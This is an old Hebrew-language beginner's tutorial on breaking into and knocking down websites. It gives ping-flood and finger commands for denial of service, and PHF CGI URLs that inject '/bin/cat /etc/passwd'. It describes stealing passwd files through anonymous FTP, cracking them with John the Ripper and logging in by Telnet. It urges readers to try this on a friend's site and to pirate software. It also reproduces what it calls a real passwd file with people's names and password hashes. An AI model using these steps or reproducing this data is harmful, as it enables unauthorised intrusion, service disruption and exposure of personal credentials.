איך פורצים לאתר ?
~~~~~~~~~~~~~~~~~~~~
יש הרבה מאוד שיטות אבל יש להבדיל בין להפיל אתר לבין לפרוץ אותו, להפיל אותו זאת אומרת שהוא
לא יעבוד ולפרוץ אותו זאת אומרת שאתם יכולים להעתיק לשנות להעלות ולמחוק ממנו קבצים ולגשת לכל
קובץ שאתם רוצים באתר.
בכל מה שקשור להפלת ולפריצת אתרים ושרתים יותר נוח וקל להשתמש במערכת הפעלה של לינוקס או יוניקס.
איך להפיל אתר ?
אפשר להפיל אתר עם לחץ עליו אני יקרא לזה שיטת דפיקת בדלת אפשר לשלוח לו מידע עד שהסרבר שלו מתפוצץ
ואז הוא מפסיק לעבוד לדוגמא:
ping -t -l 256 xxx.xxx.xxx.xxx
צריך לכתוב את הפקודה ב-DOS שהאיקסים הם האיי פי של האתר המינוס טי אומר שזה לא יפסיק ולא אומר כמה
בייטים לשלוח לו אם אתם רוצים להגביר את הדפיקה בדלת צריך להרים את המספר 256 למספר יותר גבוה
ולהפעיל בכמה חלונות.
האיי פי של האתר רשום בדפדפן למטה כשאתם נכנסים לאתר, כשאתם מפילים אתר בשיטה הזאת הוא חייב להיות
עם שרת משלו (לאתרים שנמצאים על אותו שרת יש כתובת איי פי זהה, לאתרים פרטיים אין בדרך-כלל שרת
עצמאי משלהם והם ממוקמים על שרת אחר).
מומלץ להשתמש בלינוקס או יוניקס ולכתוב את הפקודה הזאת:
finger @@@@@@@@@@@ http://webpage_goes_here
תחליפו את כתובת האתר במה שאתם רוצים להפגיז אבל זה עובד רק ביוניקס ובלינוקס.
שיטות אלה נקראות דפיקה בדלת מכיוון שדופקים עד שהיא מתפרקת.
אני מסתמך על זה שאני בין המאות היחידות בארץ שיש להם יוניקס אז בלפרוץ אתר אני ישתמש בפקודת
לחלונות, בואו נתחיל יש הרבה מאוד שיטות להפלת אתרים, יש איזה מיליון שיטות לפרוץ לאתרים אבל יש
שלוש מפורסמות:
PHF, FTP, Exploit - אקספלויט היא הכי טובה הכי מקצועית והיא גם הכי מסובכת.
שיטת ה- Exploits הכי טובה הכי מקצועית והכי מסובכת מבוססת על Telnet בדרך כלל.
אני יכול להגיד לכם בגדול ששיטות האקספלויט מבוססות על תקלות נפוצות בשרתים שנמצאות בזמן מסוים.
במסמך זה אני יסביר את שתי השיטות האחרות Anonymos FTP ו- PHF.
אז פריצה לאתר (או לכל שרת אחר) היא בשלושה שלבים:
1. השגת קובץ passwd
2. פריצת קובץ ה- passwd עם קראקר ומציאת UserName ו- PassWord
3. כניסה לאתר דרך Telnet עם ה- UserName וה- PassWord שהישגתם
נזכרתי צריך גם אתר עליו אתם רוצים לפרוץ ...
אני לא ממליץ לנסות לפרוץ לאתרים גדולים ומפורסמים לרוב יש FireWall וזה לא דבר שקל לעבור,
לאתר של החבר דווקא כדאי לנסות בשביל הכיף. פריצת קובץ passwd זה לא ענין מסובך כמו שזה נשמע אתם
צריכים להוריד קראקר Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper
אני ממליץ על ארבעת אלה, למרות שחלק מהם עובדים רק על יוניקס.
לי יותר קשה למצוא את הקובץ מלפרוץ אותו.
כדי לפרוץ לאתר צריכים:
- FTP Client אפשר להוריד גירסת הדגמה מ:
www.ftpvoyager.com
ואחר-כך לחפש קראק לתוכנה ב-AstaLaVista.com כדי שתהיה לכם אפשרות להשתמש בתוכנה ללא הגבלת זמן.
- Telnet Client
אמור להיות בתיקית החלונות של כל מחשב שמחובר לאינטרנט
- Password Cracker אפשר להוריד מ:
/www.hackpalace.com/cracking/unix-passwords
- Dictionary Word List אפשר להוריד מ:
http://wacophreak.hypermart.net/archives.htm
הדרך הקלה ביותר (יחסית ליעילות שלה) היא אף טי פי אנונימי.
לפני שאנחנו משיגים את קובץ ה- passwd ניראה איך ניראה הקובץ.
יש שני סוגים של קבצי passwd.
הראשון שאני יסביר הוא UN-Shadowed Password File.
הנה לדוגמא קובץ אמיתי שאני מצאתי:
fldl0001:oS6quCRbDkmuM:537:300:Diane Laing:/home/fldl0001:/bin/bash
alastair:UZ9MFB7pOLvH6:540:100:Alastair Sommerville:/home/alastair:/bin/bash
y2aberne:SjfSyVTnZ3ZT6:541:300:Kate Abernethy:/home/y2aberne:/bin/bash
y2ronxin:Ter0LeetG7uH6:542:300:Maggie Ronxin:/home/y2ronxin:/bin/bash
y2fair:.HocpfcuhgBbU:543:300:Jane Fair:/home/y2fair:/bin/bash
y2mcbrid:faARb1ftg.xfg:544:300:Emma McBride:/home/y2mcbrid:/bin/bash
y2hunter:HdXaBQoGpdR1Q:545:300:Gavin Hunter:/home/y2hunter:/bin/bash
y2marsha:3dtDG9VDCAXAw:546:300:Ruth Marshall:/home/y2marsha:/bin/bash
y2halket:AcuYHIXytcDac:547:300:Steven Halkett:/home/y2halket:/bin/bash
y2macfar:g1k5tnbE3mn4w:548:300:Cassidy MacFarlane:/home/y2macfar:/bin/bash
d2wilson:u7TfMN0MeKPjY:550:300:Robert Wilson:/home/d2wilson:/bin/bash
d2hunter:b7wdUmJobrfuc:551:300:Douglas Hunter:/home/d2hunter:/bin/bash
d2bell:k9SnbgYAdblnI:552:100:David Bell:/home/d2bell:/bin/bash
d2lane:eArmBPOBOn3J.:553:300:David Lane:/home/d2lane:/bin/bash
y2bentle:A725bDhP/gCNE:554:300:Scott Bentley:/home/y2bentle:/bin/bash
הקבצים יכולים להיות גם יותר ארוכים.
באו ניקח שורה לדוגמא מהקובץ:
y2bentle:A725bDhP/gCNE:554:300:Scott Bentley:/home/y2bentle:/bin/bash
עכשיו אנחנו יכולים להבין את המבנה הבסיסי של קבצים מהסוג הזה:
Username:encrypted password:user number:group number:real name:home directory:type of shell
ועכשיו לסוג השני של הקבצים Shadowed Password Files:
הנה עוד קובץ לדוגמא:
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:31:Owner of many system processes:/root:
operator:*:2:20:System &:/usr/guest/operator:/bin/csh
bin:*:3:7:Binaries Commands and Source,,,:/:/nonexistent
games:*:7:13:Games pseudo-user:/usr/games:
news:*:8:8:News Subsystem:/:/nonexistent
man:*:9:9:Mister Man Pages:/usr/share/man:
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:*:67:67:X-10 daemon:/usr/local/xten:/nonexistent
nobody:*:65534:65534:Unprivileged user:/nonexistent:/nonexistent
ftp:*:14:5:Anonymous FTP Admin:/var/ftp:/bin/date
y2bentle:*:554:300:Scott Bentley:/home/y2bentle:/bin/bash
אז עכשיו לחלק המעשי אתם צריכים להיכנס לאתר שאליו אתם רוצים לפרוץ דרך FTP,
כדי להיכנס לאתר דרך אף טי פי בדפדפן צריך לרשום:
ftp://webpage_goes_here
אם אתם מנסים להיכנס דרך אף טי פי בדפדפן מומלץ מאוד להשתמש בנטסקייפ.
כדאי לדעת שכמעט 99% מהשרתים לא מאפשרים כניסה דרך אף טי פי אנונימי.
רוב הפעמים לא תצליחו ותיקבלו הודעות כמו: Anonymous Users Not Allowed
מה שאומר שהאתר לא מאפשר או חוסם גישה לכניסה אנונימית דרך אף טי פי.
במקרה שלא הצלחתם אתם יכולים להפעיל את FTP Client שהורדתם או כל תוכנת FTP אחרת ולנסות להיכנס,
רוב הפעמים לא תצליחו, אז אתם צריכים לנסות לשחק עם ה-ports מה שקוראים באנגלית port surfing.
אם האתר עליו ניסיתם להיכנס מוגן חזק דרך FireWall אז אתם צריכים להתחיל לעשות דברים כמו Trace כדי
לראות איזה מחשבים עובדים עם המחשב הזה ולנסות לפרוץ עליהם.
כשמנסים להיכנס לאתר דרך אף טי פי בתוכנת FTP Client צריכים למלא את הפרטים הבאים:
FTP SERVER-target goes here
NAME-name of target goes here
LOGIN NAME-anonymous
PASSWORD-your email or "an" email address here
אם הצלחתם להיכנס לאתר ב- FTP דרך הדפדפן או דרך תוכנת FTP Client אתם אמורים לראות לפחות 4 תיקיות:
/bin
/etc
/lib
/pub
תחפשו קובץ בשם passwd או בשם passwd.db בתיקיה etc ותעתיקו אותו למחשב שלכם.
שיטת ה-PHF לפריצת אתרי Web - אני לא בטוח אם מסמך זה יעזור למישהו, שיטת ה-PHF היא שיטה פשוטה מאוד
אבל ביותר מ-99% מהפעמים היא לא עובדת, פעם היא עבדה אבל השרתים למדו להתגונן ממנה.
כל מי שמבין קצת בהאקינג (ולא סתם מזין את המוח) יודע שכדי לפרוץ לאתר אתה צריך להיכנס לדף אנונימי
להוריד את קובץ הפס וורד ולפרוץ אותו עם Cracker.
אז הנה זה בא:
http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
או:
http://webpage_goes_here/cgi-bin/phf?Qalias=j00%ffcat%20/etc/passwd
איפה שכתוב: webpage goes here כותבים את כתובת האתר.
אם הצלחתם תראו את קובץ ה- passwd ותעתיקו אותו למחשב שלכם.
עכשיו אחרי שהישגתם את קובץ ה- passwd אתם צריכים להעתיק אותו לתיקיה של הקראקר ולהעתיק לתיקיה של
הקראקר גם את קובץ ה-Dictionary Word List שהורדתם.
אם אתם משתמשים בקראקר John the Ripper תיכנסו דרך DOS לתיקיה של הקראקר ותיכתבו:
john -w:Dictionary_FileName_goes_here Password_FileName_goes_here
הקראקר ינסה לחבר כל מילה שנמצאת ב-Dictionary Word List לבין הסיסמה המוסתרת בקובץ ה- passwd
עד שהוא ימצא את השילוב המתאים.
אם הצלחתם הוא יתן לכם UserName ו- PassWord ברוב הפעמים יותר מאחד.
אם אתם משתמשים בקראקר Cracker Jack אתם חייבים לצאת מחלונות ל-DOS כי הקראקר חייב לעבוד במצב
"אמיתי" של MS-DOS בגלל שהוא משתמש ב"זכרון נקי".
כאשר תפעילו את הקראקר הוא ישאל אותכם לגבי ה- Password File וה- Dictionary File:
PWfile(s): Password File
Wordfile: Dictionary File
אחרי שהישגתם UserName ו -PassWord תפעילו את Telnet Client.
עכשיו תלחצו על FILE - REMOTE SYSTEM ותכניסו את כתובת האתר, אחר-כך תצטרכו להכניס את ה- UserName
וה- Password שהישגתם ופרצתם לאתר !!!
|
|
